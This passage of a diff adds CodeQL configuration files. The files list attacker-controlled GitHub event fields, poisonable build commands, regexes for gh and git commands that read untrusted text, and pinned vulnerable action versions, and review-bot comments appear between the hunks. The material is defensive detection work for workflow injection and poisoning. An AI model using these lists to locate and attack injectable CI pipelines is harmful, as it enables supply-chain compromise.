+ # workflow_call receives the same event payload as the calling workflow
+ - ["workflow_call", "github.event.comment"]
+ - ["workflow_call", "github.event.discussion"]
+ - ["workflow_call", "github.event.inputs"]
+ - ["workflow_call", "github.event.issue"]
+ - ["workflow_call", "github.event.pages"]
+ - ["workflow_call", "github.event.pull_request"]
+ - ["workflow_call", "github.event.review"]
+ - ["workflow_call", "github.event.workflow"]
+ - ["workflow_call", "github.event.workflow_run"]
+ - ["workflow_call", "github.event.changes"]
+
diff --git a/actions/ql/lib/ext/config/externally_triggereable_events.yml b/actions/ql/lib/ext/config/externally_triggereable_events.yml
new file mode 100644
index 000000000000..e1bfca52ea79
--- /dev/null
+++ b/actions/ql/lib/ext/config/externally_triggereable_events.yml
@@ -0,0 +1,19 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: externallyTriggerableEventsDataModel
+ data:
+ - ["discussion"]
+ - ["discussion_comment"]
+ - ["fork"]
+ - ["watch"]
+ - ["issue_comment"]
+ - ["issues"]
+ - ["pull_request_comment"]
+ - ["pull_request_review"]
+ - ["pull_request_review_comment"]
+ - ["pull_request_target"]
+ - ["workflow_run"] # depending on branch filter
+ - ["workflow_call"] # depending on caller
+ - ["workflow_dispatch"]
+ - ["scheduled"]
diff --git a/actions/ql/lib/ext/config/immutable_actions.yml b/actions/ql/lib/ext/config/immutable_actions.yml
new file mode 100644
index 000000000000..d6a9b1020d73
--- /dev/null
+++ b/actions/ql/lib/ext/config/immutable_actions.yml
@@ -0,0 +1,22 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: immutableActionsDataModel
+ data:
+ - ["actions/checkout"]
+ - ["actions/cache"]
+ - ["actions/setup-node"]
+ - ["actions/upload-artifact"]
+ - ["actions/setup-python"]
+ - ["actions/download-artifact"]
+ - ["actions/github-script"]
+ - ["actions/setup-java"]
+ - ["actions/setup-go"]
+ - ["actions/upload-pages-artifact"]
+ - ["actions/deploy-pages"]
+ - ["actions/setup-dotnet"]
+ - ["actions/stale"]
+ - ["actions/labeler"]
+ - ["actions/create-github-app-token"]
+ - ["actions/configure-pages"]
+ - ["octokit/request-action"]
diff --git a/actions/ql/lib/ext/config/poisonable_steps.yml b/actions/ql/lib/ext/config/poisonable_steps.yml
new file mode 100644
index 000000000000..3c1aec70a240
--- /dev/null
+++ b/actions/ql/lib/ext/config/poisonable_steps.yml
@@ -0,0 +1,76 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: poisonableActionsDataModel + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["azure/powershell"] + - ["pre-commit/action"] + - ["oxsecurity/megalinter"] + - ["bridgecrewio/checkov-action"] + - ["ruby/setup-ruby"] + - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] + - addsTo: + pack: codeql/actions-all + extensible: poisonableCommandsDataModel + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["ant"] + - ["asv"] + - ["awk\\s+-f"] + - ["bundle"] + - ["bun"] + - ["cargo"] + - ["checkov"] + - ["eslint"] + - ["gcloud\\s+builds submit"] + - ["golangci-lint"] + - ["gomplate"] + - ["goreleaser"] + - ["gradle"] + - ["java\\s+-jar"] + - ["make"] + - ["mdformat"] + - ["mkdocs"] + - ["msbuild"] + - ["mvn"] + - ["mypy"] + - ["(p)?npm\\s+[a-z]"] + - ["pre-commit"] + - ["prettier"] + - ["phpstan"] + - ["pip\\s+install(.*)\\s+-r"] + - ["pip\\s+install(.*)\\s+--requirement"] + - ["pip(x)?\\s+install(.*)\\s+\\."] + - ["poetry"] + - ["pylint"] + - ["pytest"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"] + - ["rake"] + - ["rails\\s+db:create"] + - ["rails\\s+assets:precompile"] + - ["rubocop"] + - ["sed\\s+-f"] + - ["sonar-scanner"] + - ["stylelint"] + - ["terraform"] + - ["tflint"] + - ["yarn"] + - ["webpack"] + - addsTo: + pack: codeql/actions-all + extensible: poisonableLocalScriptsDataModel + data: + # TODO: It could also be in the form of `dir/cmd` + - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate + - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . 
venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] + - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] + - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2] + - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] + - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] + - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] + diff --git a/actions/ql/lib/ext/config/untrusted_event_properties.yml b/actions/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 000000000000..cf3d6df80949 --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_event_properties.yml 
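Review bot: Several entries in `poisonableCommandsDataModel` are bare substrings with no word boundary — `ant`, `bun`, `make`, `gradle` — so if the consumer applies them with `regexpFind` rather than anchoring (not visible in this hunk), `ant` matches inside `important`, `bun` inside `ubuntu` and `make` inside `cmake`. Wrapping the short ones as `\bant\b`, `\bbun\b`, `\bmake\b` keeps the intent without those false positives. In `poisonableLocalScriptsDataModel`, `(\.\s+[^\s]+)\b` (sourcing a file with `.`) also matches a sentence-ending period followed by a word inside any quoted message; requiring the dot at a command position, something like `(?:^|[;&|]\s*)(\.\s+[^\s]+)\b`, narrows it. `npx` is absent although it executes packages from the checked-out tree much as `npm run` does.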
@@ -0,0 +1,84 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedEventPropertiesDataModel + data: + # TITLE + - ["github\\.event\\.issue\\.title", "title"] + - ["github\\.event\\.pull_request\\.title", "title"] + - ["github\\.event\\.discussion\\.title", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] + - ["github\\.event\\.workflow_run\\.display_title", "title"] + - ["github\\.event\\.changes\\.title\\.from", "title"] + # URL + - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] + # TEXT + - ["github\\.event\\.issue\\.body", "text"] + - ["github\\.event\\.pull_request\\.body", "text"] + - ["github\\.event\\.discussion\\.body", "text"] + - ["github\\.event\\.review\\.body", "text"] + - ["github\\.event\\.comment\\.body", "text"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"] + - ["github\\.event\\.head_commit\\.message", "text"] + - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] + - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] + - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] + - ["github\\.event\\.changes\\.body\\.from", "title"] + # BRANCH + - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] + - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] + - ["github\\.event\\.workflow_run\\.head_branch", "branch"] + - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] + - ["github\\.event\\.merge_group\\.head_ref", "branch"] + - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"] + # LABEL + - ["github\\.event\\.pull_request\\.head\\.label", "label"] + # EMAIL + - ["github\\.event\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.head_commit\\.committer\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"] + - 
["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"] + - ["github\\.event\\.merge_group\\.committer\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"] + # USERNAME + - ["github\\.event\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.head_commit\\.committer\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"] + - ["github\\.event\\.merge_group\\.committer\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"] + # PATH + - ["github\\.event\\.workflow\\.path", "path"] + - ["github\\.event\\.workflow_run\\.path", "path"] + - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"] + # JSON + - ["github", "json"] + - ["github\\.event", "json"] + - ["github\\.event\\.comment", "json"] + - ["github\\.event\\.commits", "json"] + - ["github\\.event\\.discussion", "json"] + - ["github\\.event\\.head_commit", "json"] + - ["github\\.event\\.head_commit\\.author", "json"] + - ["github\\.event\\.head_commit\\.committer", "json"] + - ["github\\.event\\.issue", "json"] + - ["github\\.event\\.merge_group", "json"] + - ["github\\.event\\.merge_group\\.committer", "json"] + - ["github\\.event\\.pull_request", "json"] + - ["github\\.event\\.pull_request\\.head", "json"] + - ["github\\.event\\.pull_request\\.head\\.repo", "json"] + - ["github\\.event\\.pages", "json"] + - ["github\\.event\\.review", "json"] + - ["github\\.event\\.workflow", "json"] + - ["github\\.event\\.workflow_run", "json"] + - ["github\\.event\\.workflow_run\\.head_branch", "json"] + - ["github\\.event\\.workflow_run\\.head_commit", "json"] + - 
["github\\.event\\.workflow_run\\.head_commit\\.author", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] + - ["github\\.event\\.workflow_run\\.head_repository", "json"] + - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + - ["github\\.event\\.changes", "json"] + + diff --git a/actions/ql/lib/ext/config/untrusted_gh_command.yml b/actions/ql/lib/ext/config/untrusted_gh_command.yml new file mode 100644 index 000000000000..c81c048e45eb --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_gh_command.yml 
@@ -0,0 +1,56 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedGhCommandDataModel + data: + # + # PULL REQUESTS + # + # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"] + # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"] + # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body) + - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # + # API + # + # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})" + # + # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"] + # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + - 
["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"] + # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"] + # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"] + diff --git a/actions/ql/lib/ext/config/untrusted_git_command.yml b/actions/ql/lib/ext/config/untrusted_git_command.yml new file mode 100644 index 000000000000..05fda3e1cd9f --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_git_command.yml 
@@ -0,0 +1,32 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedGitCommandDataModel + data: + # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) + - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] + # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); + # CHANGES=$(git diff --name-only) + - ["git\\b.*\\bdiff\\b", "filename,multiline"] + # COMMIT_MESSAGE=$(git log --format=%s -n 1) + - ["git\\b.*\\blog\\b.*%s", "text,online"] + # COMMIT_MESSAGE=$(git log --format=%B -n 1) + - ["git\\b.*\\blog\\b.*%B", "text,multiline"] + # COMMIT_MESSAGE=$(git log --format=oneline) + - ["git\\b.*\\blog\\b.*oneline", "text,oneline"] + # COMMIT_MESSAGE=$(git show -s --format=%B) + # COMMIT_MESSAGE=$(git show -s --format=%s) + - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"] + - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"] + # AUTHOR=$(git log -1 --pretty=format:'%an') + - ["git\\b.*\\blog\\b.*%an", "username,oneline"] + # AUTHOR=$(git show -s --pretty=%an) + - ["git\\b.*\\bshow\\b.*%an", "username,oneline"] + # EMAIL=$(git log -1 --pretty=format:'%ae') + - ["git\\b.*\\blog\\b.*%ae", "email,oneline"] + # EMAIL=$(git show -s --pretty=%ae) + - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"] + # BRANCH=$(git branch --show-current) + - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"] + # BRANCH=$(git rev-parse --abbrev-ref HEAD) + - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"] diff --git a/actions/ql/lib/ext/config/vulnerable_actions.yml b/actions/ql/lib/ext/config/vulnerable_actions.yml new file mode 100644 index 000000000000..1fe00ad733bb --- /dev/null +++ b/actions/ql/lib/ext/config/vulnerable_actions.yml 
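Review bot: The `git log ... %s` row is tagged `"text,online"`, a typo for the `oneline` flag every other row uses; if the consumer of `untrustedGitCommandDataModel` parses the second column into flags, that source is silently mis-typed or dropped — change it to `["git\\b.*\\blog\\b.*%s", "text,oneline"]`. The format placeholders covered are `%s`, `%B`, `%an` and `%ae` only; `%b` (body), `%cn`/`%ce` (committer name and email) and `%ad`-style author fields are equally attacker-controlled in a PR commit and are not matched. `git show` is only recognised together with `-s`, so `git show --no-patch --format=%B` and `git show --quiet --format=%s` slip through.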
@@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - ["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - ["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", 
"4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - 
["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", 
"v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", 
"a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", 
"c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", 